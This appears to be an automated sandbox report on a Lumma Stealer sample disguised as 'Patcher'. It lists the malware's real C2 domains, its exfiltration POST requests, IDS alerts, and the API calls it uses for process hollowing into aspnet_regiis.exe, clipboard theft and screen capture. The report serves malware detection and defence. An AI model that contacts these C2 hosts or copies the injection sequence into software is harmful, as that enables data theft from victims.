Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_72C4CFC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	2_2_72C7F7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [edi+ecx]	2_2_72C827B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, ebx	2_2_72C5CF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+289080F7h]	2_2_72C5AF37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, edx	2_2_72C6B730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then not eax	2_2_72C56F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, esi	2_2_72C564F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, esi	2_2_72C56486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp eax	2_2_72C4E453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_72C65C05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then push eax	2_2_72C80400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, ecx	2_2_72C6B40D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [edi+ecx]	2_2_72C82410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then push eax	2_2_72C80C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_72C475C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	2_2_72C475C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_72C6EDD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_72C705A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+09h]	2_2_72C5C5A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_72C625B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	2_2_72C625B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [esi+10h], ecx	2_2_72C6FD42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [esi], edx	2_2_72C6FD42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+218BAD1Eh]	2_2_72C59567
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_72C6ED78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esi+1Ch]	2_2_72C70504
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_72C6ED2F

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058638 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cureprouderio .click) : 192.168.2.4:59194 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49731 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49737 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49736 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49734 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49732 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49735 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49730 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49733 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 172.67.132.7:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: cureprouderio.click
Source: Malware configuration extractor	URLs: tirepublicerj.shop

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.132.7:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=B19UGHS7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18110Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EPPY8583NRMLK1Y9P1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8791Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JFRI0XTWAP9VNETUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20426Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7KD821I4EZLFXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1244Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CHY259J8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569954Host: cureprouderio.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: cureprouderio.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cureprouderio.click

Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: aspnet_regiis.exe, 00000002.00000003.1699137296.00000000053DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: aspnet_regiis.exe, 00000002.00000003.1672075755.0000000002D59000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1712211589.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1770621698.00000000053BD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1713958130.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729722312.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/
Source: aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/$&%W&
Source: aspnet_regiis.exe, 00000002.00000002.1770111652.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1698975057.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1712211589.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/api
Source: aspnet_regiis.exe, 00000002.00000003.1672035128.0000000002D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/api(
Source: aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/api9
Source: aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/bu
Source: aspnet_regiis.exe, 00000002.00000003.1672035128.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672075755.0000000002D59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/gg
Source: aspnet_regiis.exe, 00000002.00000002.1770259602.0000000002DA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736047907.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1713958130.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729722312.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/jh
Source: aspnet_regiis.exe, 00000002.00000003.1672035128.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672075755.0000000002D59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cureprouderio.click/pi
Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: aspnet_regiis.exe, 00000002.00000003.1673314672.0000000005410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: aspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: aspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: aspnet_regiis.exe, 00000002.00000003.1673314672.0000000005410000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688210656.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688005128.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688081939.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1673362478.0000000005409000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: aspnet_regiis.exe, 00000002.00000003.1673362478.00000000053E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: aspnet_regiis.exe, 00000002.00000003.1673314672.0000000005410000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688210656.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688005128.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1688081939.0000000005409000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1673362478.0000000005409000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: aspnet_regiis.exe, 00000002.00000003.1673362478.00000000053E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000002.00000003.1701112046.00000000053B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: aspnet_regiis.exe, 00000002.00000003.1672789050.00000000053FD000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672851922.00000000053FA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1672922464.00000000053FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: aspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: aspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: aspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 00000002.00000003.1700242615.00000000054D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49736 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_72C76F60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_72C76F60

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_72C76F60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_72C76F60

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_72C77363 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_72C77363

System Summary

.NET source code contains very large array initializations

Source: Patcher_I5cxa9AN.exe, -----------------------------------------.cs

Large array initialization: _206D_200F_206B_202E_202B_200F_202E_206D_206D_206C_206A_206B_200B_206F_206F_200F_200E_206C_200C_202E_206D_202A_206C_202E_200B_200F_206E_200F_206F_200B_202A_202D_206D_206A_200D_206C_206D_202D_206F_200C_202E: array initializer size 431616

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe

Memory allocated: 72C40000 page execute and read and write

Jump to behavior

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDE3170 GetModuleHandleW,NtQueryInformationProcess,		0_2_6CDE3170
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 0_2_6CDE3780 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,NtGetContextThread,NtWriteVirtualMemory,NtReadVirtualMemory,NtSetContextThread,NtResumeThread,		0_2_6CDE3780

